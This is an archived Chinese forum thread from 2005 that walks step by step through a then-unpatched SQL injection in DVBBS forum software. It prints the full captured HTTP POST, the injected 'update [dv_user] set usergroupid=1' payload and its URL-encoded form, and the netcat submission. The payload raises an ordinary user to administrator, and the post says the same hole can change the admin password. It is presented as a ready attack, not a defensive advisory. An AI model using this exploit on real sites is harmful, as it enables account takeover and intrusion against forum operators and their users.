收藏文章 楼主
动网BBS最新高危漏洞
网友【血蜘蛛】 2005-06-21 21:33:20 分享在【时代发展的印记】版块    9    1

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片

分享在 meiguo.com 上的图片
动网BBS系统的新漏洞,动网官方论坛到现在都还没出补丁。是刚发现的!那我们要首先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?呵呵``点进去看看有没有固定帖子什么的,我是自己架设的平台做测试的。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。然后点下设置固顶如图1
meiguo.com 发布人签名/座右铭·有时你看似是一件很吃亏的事,往往会变成非常有得的事。
·凡事都留有余地,因为人是人,不是神,不免有错处,可以原谅人的地方,就原谅人。
·好的时候不要看得太好,坏的时候不要看的太坏。
大家都在看
回复/评论列表
默认   热门   正序   倒序
血蜘蛛
2F
血蜘蛛 Lv0
按正常的方式固顶,如图2
 0   2005-06-21 21:33:55  回复
血蜘蛛
3F
血蜘蛛 Lv0
到这里我们先暂停,打开WSE抓包工具准备抓取提交的post信息,打开了之后点下确认*作。现在看看WSE抓到些什么东西了,如图3
 0   2005-06-21 21:34:37  回复
血蜘蛛
4F
血蜘蛛 Lv0
截取到了post提交信息,复制下来,内容如下:

POST /sql/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://192.168.1.254/sql/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler ; .NET CLR 1.1.4322)

Host: 192.168.1.254

Content-Length: 133

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: 192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL; ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0

istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成250吧。修改完之后就用NC提交,如图4
 0   2005-06-21 21:35:16  回复
血蜘蛛
5F
血蜘蛛 Lv0
意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.

接着打开我们输出的1.htm看看,如图5
 0   2005-06-21 21:35:38  回复
血蜘蛛
6F
血蜘蛛 Lv0
语法错误?知道是为什么吗?前面我说过了,Content-Length的长度我没数,语句只执行到1,1);update [dv_user] set usergroupid=1 where user这里,语句都没执行完,能正确吗?不过不要紧,我们把长度多加几个数就改成278吧然后再次提交,然后查看1.htm的输出结果,如图6
 0   2005-06-21 21:36:17  回复
血蜘蛛
7F
血蜘蛛 Lv0
看到没有?*作成功。成功执行了我们的注入语句。我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:619054,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,如图7
 0   2005-06-21 21:36:56  回复
血蜘蛛
8F
血蜘蛛 Lv0
呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的!~``汗```Pizzaviat

文章来源于红客联盟:

http://forum.chinahonker.com/index.php?...e=end&tid=59904
 0   2005-06-21 21:37:59  回复
蝶舞门人
9F
太强,不能不顶----
 0   2005-09-15 10:13:41  回复
meiguo.com 创始人

emotion

1   2005-06-21 21:33:20  回复

回复/评论:动网BBS最新高危漏洞

暂无用户组 升级
退出
等级:0级
美果:
美过
精华推荐
  1. 感恩节餐桌的费用回落,零售商推出了低价套餐!
  2. 中美AI竞争的新格局已定?
  3. 英伟达H200芯片的对华销售仍然在受美国的两重限制
  4. 在海外漂泊12年后的真实感受
  5. 美国华人揭示的五大高收入职业
  6. SpaceX在加速IPO计划,目标估值1.5万亿美元!
  7. 中美高层通话后… 川普总统计划明年访华,芯片管制也松口了!
  8. 黄仁勋警示川普政府,再不开放“对华AI芯片出口”就来不及啦!
  9. 川普总统正式签属涉台法案,解放军示警!
  10. 外国人的入境中国手续简化,可以提前在网上填报入境卡了!
  11. 美国仍然依赖纸质信件的真相剖析
  12. 美国政府批准了对台3.3亿美元的军售
  13. 强制注销户口?传闻中国在加强双重国籍监管
  14. 美国移民局(ICE)新提案打算限制福利使用,有记录者可能影响绿卡申请!
  15. 美宝家庭关切:双国籍审查和户口注销真相
  16. 德州少女在圣诞前夜失踪,全力搜寻中!
  17. 特朗普总统宣布“平安夜”和“节礼日”也放假
  18. 中美两国元首在釜山会晤:就关税、大豆和稀土已经达成共识
  19. 多名移民法官在同时期被解雇,引发司法危机
  20. 川普政府终于听说了日本新首相【高市早苗】因为台海表态引发外交危机的事儿了?
  21. 学习英语12年后,终于实现了“美国梦”!
  22. 中国已经全额缴纳了联合国会费,联合国的财政危机缓解!
  23. 一美分硬币“Penny”铸造历史正式终结
  24. ICE启动了在社交媒体的全天候监控项目
  25. 恢复或加入?重获中国国籍的路径比较
  26. 顶级文凭可早获绿卡!H1B签证“全新加权”抽签制度生效
  27. 川普政府再次出奇招!拒绝所有胖子的移民申请?
  28. 中美经贸磋商“展现战略对称”新态势
  29. 五角大楼的机密报告:中国导弹可以击沉美军航母
  30. 美国在AI竞争中失利了?阿里千问模型在全球领先
  31. MIT稳居了CS榜首!美国大学的最新排名出炉
  32. 人类史上“最贵CEO”诞生!马斯克的“万亿薪酬”背后
  33. 马斯克指控“美国慈善家”做空特斯拉,涉案逾百亿美元!
  34. 2026年版的“公共负担”新规复活,华人家庭遭遇精准打击!
  35. 在特朗普访华之前,白宫向中国“递三份礼物”
  36. 联邦政府启动“红色日落行动” 审查比特币矿机的供应链
头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
已有0次打赏
(1) 分享
分享
取消